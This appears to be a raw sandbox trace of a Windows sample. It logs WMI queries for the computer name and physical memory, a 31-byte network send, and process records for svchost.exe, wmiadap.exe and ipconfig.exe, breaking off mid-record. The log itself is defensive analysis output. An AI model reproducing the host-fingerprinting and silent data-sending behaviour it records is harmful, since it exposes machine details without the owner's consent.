	[0267.390] IUnknown:Release (This=0x626eb44) returned 0x3
	[0267.390] CoGetContextToken (in: pToken=0x5eadac8 | out: pToken=0x5eadac8) returned 0x0
	[0267.390] IUnknown:AddRef (This=0x626eb40) returned 0x4
	[0267.390] IUnknown:QueryInterface (in: This=0x626eb40, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadb3c | out: ppvObject=0x5eadb3c*=0x0) returned 0x80004002
	[0267.390] IUnknown:Release (This=0x626eb40) returned 0x3
	[0267.391] IUnknown:Release (This=0x626eb40) returned 0x2
	[0267.391] CoGetContextToken (in: pToken=0x5eadf28 | out: pToken=0x5eadf28) returned 0x0
	[0267.391] CoGetContextToken (in: pToken=0x5eadee8 | out: pToken=0x5eadee8) returned 0x0
	[0267.391] IUnknown:AddRef (This=0x626eb40) returned 0x3
	[0267.391] IUnknown:QueryInterface (in: This=0x626eb40, riid=0x5eadf64*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5eadf60 | out: ppvObject=0x5eadf60*=0x626eb40) returned 0x0
	[0267.391] IUnknown:Release (This=0x626eb40) returned 0x3
	[0267.391] IUnknown:Release (This=0x626eb40) returned 0x2
	[0267.391] IUnknown:Release (This=0x626eb40) returned 0x1
	[0267.391] IUnknown:Release (This=0x626eb04) returned 0x2
	[0267.391] CoGetContextToken (in: pToken=0x5eae80c | out: pToken=0x5eae80c) returned 0x0
	[0267.391] IUnknown:AddRef (This=0x626eb40) returned 0x2
	[0267.391] IWbemClassObject:Get (in: This=0x626eb40, wszName="__GENUS", lFlags=0, pVal=0x5eae888*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5eae93c*=0, plFlavor=0x5eae938*=0 | out: pVal=0x5eae888*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5eae93c*=3, plFlavor=0x5eae938*=64) returned 0x0
	[0267.392] IWbemClassObject:Get (in: This=0x626eb40, wszName="__PATH", lFlags=0, pVal=0x5eae868*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5eae920*=0, plFlavor=0x5eae91c*=0 | out: pVal=0x5eae868*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x5eae920*=8, plFlavor=0x5eae91c*=64) returned 0x0
	[0267.392] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0267.392] CoGetObjectContext (in: riid=0x2b3adb0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae8c0 | out: ppv=0x5eae8c0*=0x2d8dec) returned 0x0
	[0267.392] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae8b8 | out: pAptType=0x5eae8b8*=1) returned 0x0
	[0267.392] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2b3ad98*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae8bc | out: ppvObject=0x5eae8bc*=0x0) returned 0x80004002
	[0267.392] IUnknown:Release (This=0x2d8dec) returned 0x1
	[0267.392] CoGetClassObject (in: rclsid=0x38bb74*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae3d8 | out: ppv=0x5eae3d8*=0x626def8) returned 0x0
	[0267.393] WbemDefPath:IUnknown:QueryInterface (in: This=0x626def8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae208 | out: ppvObject=0x5eae208*=0x0) returned 0x80004002
	[0267.393] WbemDefPath:IClassFactory:CreateInstance (in: This=0x626def8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae240 | out: ppvObject=0x5eae240*=0x626e8d8) returned 0x0
	[0267.393] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e8d8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadfe4 | out: ppvObject=0x5eadfe4*=0x626e8d8) returned 0x0
	[0267.393] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e8d8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadfa0 | out: ppvObject=0x5eadfa0*=0x0) returned 0x80004002
	[0267.393] WbemDefPath:IUnknown:AddRef (This=0x626e8d8) returned 0x3
	[0267.393] CoGetContextToken (in: pToken=0x5eade2c | out: pToken=0x5eade2c) returned 0x0
	[0267.393] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e8d8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade14 | out: ppvObject=0x5eade14*=0x3bed48) returned 0x0
	[0267.393] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x3bed48, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eade1c | out: pCid=0x5eade1c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0267.394] WbemDefPath:IUnknown:Release (This=0x3bed48) returned 0x3
	[0267.394] CoGetContextToken (in: pToken=0x5eade24 | out: pToken=0x5eade24) returned 0x0
	[0267.394] WbemDefPath:IUnknown:AddRef (This=0x626e8d8) returned 0x4
	[0267.394] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e8d8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade98 | out: ppvObject=0x5eade98*=0x0) returned 0x80004002
	[0267.394] WbemDefPath:IUnknown:Release (This=0x626e8d8) returned 0x3
	[0267.394] WbemDefPath:IUnknown:Release (This=0x626e8d8) returned 0x2
	[0267.394] WbemDefPath:IUnknown:Release (This=0x626def8) returned 0x0
	[0267.394] WbemDefPath:IUnknown:Release (This=0x626e8d8) returned 0x1
	[0267.394] CoGetContextToken (in: pToken=0x5eae6d4 | out: pToken=0x5eae6d4) returned 0x0
	[0267.394] CoGetContextToken (in: pToken=0x5eae694 | out: pToken=0x5eae694) returned 0x0
	[0267.394] WbemDefPath:IUnknown:AddRef (This=0x626e8d8) returned 0x2
	[0267.394] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e8d8, riid=0x5eae710*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae70c | out: ppvObject=0x5eae70c*=0x626e8d8) returned 0x0
	[0267.395] WbemDefPath:IUnknown:Release (This=0x626e8d8) returned 0x2
	[0267.395] WbemDefPath:IUnknown:Release (This=0x626e8d8) returned 0x1
	[0267.395] CoGetContextToken (in: pToken=0x5eae754 | out: pToken=0x5eae754) returned 0x0
	[0267.395] CoGetContextToken (in: pToken=0x5eae714 | out: pToken=0x5eae714) returned 0x0
	[0267.395] WbemDefPath:IUnknown:AddRef (This=0x626e8d8) returned 0x2
	[0267.395] WbemDefPath:IUnknown:QueryInterface (in: This=0x626e8d8, riid=0x5eae790*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae78c | out: ppvObject=0x5eae78c*=0x626e8d8) returned 0x0
	[0267.395] WbemDefPath:IUnknown:Release (This=0x626e8d8) returned 0x2
	[0267.395] WbemDefPath:IUnknown:AddRef (This=0x626e8d8) returned 0x3
	[0267.395] WbemDefPath:IWbemPath:SetText (This=0x626e8d8, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0267.395] WbemDefPath:IUnknown:Release (This=0x626e8d8) returned 0x2
	[0267.395] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x62750b0, puCount=0x5eae8f4 | out: puCount=0x5eae8f4*=0x2) returned 0x0
	[0267.395] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae8f0*=0x0, pszText=0x0 | out: puBuffLength=0x5eae8f0*=0x17, pszText=0x0) returned 0x0
	[0267.395] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae8f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae8f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.396] CoGetContextToken (in: pToken=0x5eae67c | out: pToken=0x5eae67c) returned 0x0
	[0267.396] IUnknown:AddRef (This=0x626eb04) returned 0x3
	[0267.396] IEnumWbemClassObject:Next (in: This=0x626eb04, lTimeout=-1, uCount=0x1, apObjects=0x38ef70, puReturned=0x30ab42c | out: apObjects=0x38ef70*=0x0, puReturned=0x30ab42c*=0x0) returned 0x1
	[0267.406] IUnknown:Release (This=0x626eb04) returned 0x2
	[0267.406] CoGetContextToken (in: pToken=0x5eae7c4 | out: pToken=0x5eae7c4) returned 0x0
	[0267.406] WbemLocator:IUnknown:Release (This=0x3ba76c) returned 0x1
	[0267.406] IUnknown:Release (This=0x626eb04) returned 0x0
	[0267.409] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x62750b0, puCount=0x5eae968 | out: puCount=0x5eae968*=0x2) returned 0x0
	[0267.409] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae964*=0x0, pszText=0x0 | out: puBuffLength=0x5eae964*=0x17, pszText=0x0) returned 0x0
	[0267.409] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae964*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae964*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.410] IWbemClassObject:Get (in: This=0x626eb40, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae924*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30ac260*=0, plFlavor=0x30ac264*=0 | out: pVal=0x5eae924*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x30ac260*=8, plFlavor=0x30ac264*=64) returned 0x0
	[0267.410] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0267.410] IWbemClassObject:Get (in: This=0x626eb40, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae928*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30ac260*=8, plFlavor=0x30ac264*=64 | out: pVal=0x5eae928*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x30ac260*=8, plFlavor=0x30ac264*=64) returned 0x0
	[0267.410] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0267.410] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x62750b0, puCount=0x5eae968 | out: puCount=0x5eae968*=0x2) returned 0x0
	[0267.410] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae964*=0x0, pszText=0x0 | out: puBuffLength=0x5eae964*=0x17, pszText=0x0) returned 0x0
	[0267.410] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae964*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae964*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.410] IWbemClassObject:Get (in: This=0x626eb40, wszName="__CLASS", lFlags=0, pVal=0x5eae924*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30ac318*=0, plFlavor=0x30ac31c*=0 | out: pVal=0x5eae924*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x30ac318*=8, plFlavor=0x30ac31c*=64) returned 0x0
	[0267.410] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0267.411] IWbemClassObject:Get (in: This=0x626eb40, wszName="__CLASS", lFlags=0, pVal=0x5eae928*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30ac318*=8, plFlavor=0x30ac31c*=64 | out: pVal=0x5eae928*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x30ac318*=8, plFlavor=0x30ac31c*=64) returned 0x0
	[0267.411] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0267.411] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x62750b0, puCount=0x5eae958 | out: puCount=0x5eae958*=0x2) returned 0x0
	[0267.411] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae954*=0x0, pszText=0x0 | out: puBuffLength=0x5eae954*=0x17, pszText=0x0) returned 0x0
	[0267.411] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae954*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae954*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.411] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x62750b0, puCount=0x5eae958 | out: puCount=0x5eae958*=0x2) returned 0x0
	[0267.411] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae954*=0x0, pszText=0x0 | out: puBuffLength=0x5eae954*=0x17, pszText=0x0) returned 0x0
	[0267.411] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae954*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae954*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.411] IWbemClassObject:GetNames (in: This=0x626eb40, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5eae91c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5eae8e8 | out: pNames=0x5eae8e8*="\x01ƀ\x04") returned 0x0
	[0267.411] SafeArrayGetDim (psa=0x3ace80) returned 0x1
	[0267.411] SafeArrayGetDim (psa=0x3ace80) returned 0x1
	[0267.411] SafeArrayGetLBound (in: psa=0x3ace80, nDim=0x1, plLbound=0x5eae4e4 | out: plLbound=0x5eae4e4) returned 0x0
	[0267.412] IWbemClassObject:Get (in: This=0x626eb40, wszName="__GENUS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30acd54*=0, plFlavor=0x30acd58*=0 | out: pVal=0x5eae914*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x30acd54*=3, plFlavor=0x30acd58*=64) returned 0x0
	[0267.412] IWbemClassObject:Get (in: This=0x626eb40, wszName="__CLASS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30acd88*=0, plFlavor=0x30acd8c*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x30acd88*=8, plFlavor=0x30acd8c*=64) returned 0x0
	[0267.412] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0267.412] IWbemClassObject:Get (in: This=0x626eb40, wszName="__SUPERCLASS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30acdec*=0, plFlavor=0x30acdf0*=0 | out: pVal=0x5eae914*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30acdec*=8, plFlavor=0x30acdf0*=64) returned 0x0
	[0267.413] IWbemClassObject:Get (in: This=0x626eb40, wszName="__DYNASTY", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30ace14*=0, plFlavor=0x30ace18*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x30ace14*=8, plFlavor=0x30ace18*=64) returned 0x0
	[0267.413] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0267.413] IWbemClassObject:Get (in: This=0x626eb40, wszName="__RELPATH", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30ace78*=0, plFlavor=0x30ace7c*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x30ace78*=8, plFlavor=0x30ace7c*=64) returned 0x0
	[0267.413] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0267.413] IWbemClassObject:Get (in: This=0x626eb40, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30acefc*=0, plFlavor=0x30acf00*=0 | out: pVal=0x5eae914*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x30acefc*=3, plFlavor=0x30acf00*=64) returned 0x0
	[0267.413] IWbemClassObject:Get (in: This=0x626eb40, wszName="__DERIVATION", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30acf30*=0, plFlavor=0x30acf34*=0 | out: pVal=0x5eae914*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ace80*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x3bed88, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x30acf30*=8200, plFlavor=0x30acf34*=64) returned 0x0
	[0267.414] IWbemClassObject:Get (in: This=0x626eb40, wszName="__SERVER", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30acf68*=0, plFlavor=0x30acf6c*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x30acf68*=8, plFlavor=0x30acf6c*=64) returned 0x0
	[0267.414] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0267.414] IWbemClassObject:Get (in: This=0x626eb40, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30acfb4*=0, plFlavor=0x30acfb8*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x30acfb4*=8, plFlavor=0x30acfb8*=64) returned 0x0
	[0267.414] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0267.414] IWbemClassObject:Get (in: This=0x626eb40, wszName="__PATH", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30ad004*=0, plFlavor=0x30ad008*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x30ad004*=8, plFlavor=0x30ad008*=64) returned 0x0
	[0267.414] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0267.414] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x62750b0, puCount=0x5eae994 | out: puCount=0x5eae994*=0x2) returned 0x0
	[0267.414] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae990*=0x0, pszText=0x0 | out: puBuffLength=0x5eae990*=0x17, pszText=0x0) returned 0x0
	[0267.415] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae990*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae990*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.415] IWbemClassObject:Get (in: This=0x626eb40, wszName="TotalPhysicalMemory", lFlags=0, pVal=0x5eae950*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30ad108*=0, plFlavor=0x30ad10c*=0 | out: pVal=0x5eae950*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2146942976", varVal2=0x0), pType=0x30ad108*=21, plFlavor=0x30ad10c*=32) returned 0x0
	[0267.415] SysStringLen (param_1="2146942976") returned 0xa
	[0267.415] IWbemClassObject:Get (in: This=0x626eb40, wszName="TotalPhysicalMemory", lFlags=0, pVal=0x5eaea08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x30ad108*=21, plFlavor=0x30ad10c*=32 | out: pVal=0x5eaea08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2146942976", varVal2=0x0), pType=0x30ad108*=21, plFlavor=0x30ad10c*=32) returned 0x0
	[0267.415] SysStringLen (param_1="2146942976") returned 0xa
	[0267.445] send (s=0x420, buf=0x30adbfc*, len=31, flags=0) returned 31
	[0267.446] GetLastError () returned 0x0
	[0267.446] recv (s=0x420, buf=0x2fa0ffc, len=502, flags=0) 

Thread:
	id = 330
	os_tid = 0xd1c


Thread:
	id = 335
	os_tid = 0xd30


Thread:
	id = 350
	os_tid = 0xd90


Thread:
	id = 356
	os_tid = 0xdac


Thread:
	id = 359
	os_tid = 0xdbc


Thread:
	id = 362
	os_tid = 0xdc8


Process:
	id = "18"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x24f0e000"
	os_pid = "0x2c8"
	os_integrity_level = "0x4000"
	os_privileges = "0x60800000"
	monitor_reason = "rpc_server"
	parent_id = "3"
	os_parent_pid = "0x1d8"
	cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\Local Service"
	bitness = "32"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7a5" [0xc000000f], "LOCAL" [0x7]


Thread:
	id = 257
	os_tid = 0xaf0


Thread:
	id = 258
	os_tid = 0x130


Thread:
	id = 259
	os_tid = 0x74c


Thread:
	id = 260
	os_tid = 0xbf8


Thread:
	id = 261
	os_tid = 0xbb0


Thread:
	id = 262
	os_tid = 0x648


Thread:
	id = 263
	os_tid = 0x414


Thread:
	id = 264
	os_tid = 0x418


Thread:
	id = 265
	os_tid = 0x5f8


Thread:
	id = 266
	os_tid = 0x5f0


Thread:
	id = 267
	os_tid = 0x5ec


Thread:
	id = 268
	os_tid = 0x5d0


Thread:
	id = 269
	os_tid = 0x12c


Thread:
	id = 270
	os_tid = 0x170


Thread:
	id = 271
	os_tid = 0x3c0


Thread:
	id = 272
	os_tid = 0x3b8


Thread:
	id = 273
	os_tid = 0x3a8


Thread:
	id = 274
	os_tid = 0x2fc


Thread:
	id = 275
	os_tid = 0x2f8


Thread:
	id = 276
	os_tid = 0x2d4


Thread:
	id = 277
	os_tid = 0x2cc


Thread:
	id = 286
	os_tid = 0xc50


Process:
	id = "19"
	image_name = "wmiadap.exe"
	filename = "c:\\windows\\system32\\wbem\\wmiadap.exe"
	page_root = "0x25085000"
	os_pid = "0xc28"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "child_process"
	parent_id = "3"
	os_parent_pid = "0x370"
	cmd_line = "wmiadap.exe /F /T /R"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "32"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 278
	os_tid = 0xc2c


Thread:
	id = 279
	os_tid = 0xc30


Thread:
	id = 280
	os_tid = 0xc34


Thread:
	id = 281
	os_tid = 0xc38


Thread:
	id = 282
	os_tid = 0xc3c


Thread:
	id = 283
	os_tid = 0xc40


Process:
	id = "20"
	image_name = "ipconfig.exe"
	filename = "c:\\windows\\system32\\ipconfig.exe"
	page_root = "0x1d443000"
	os_pid = "0xc64"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
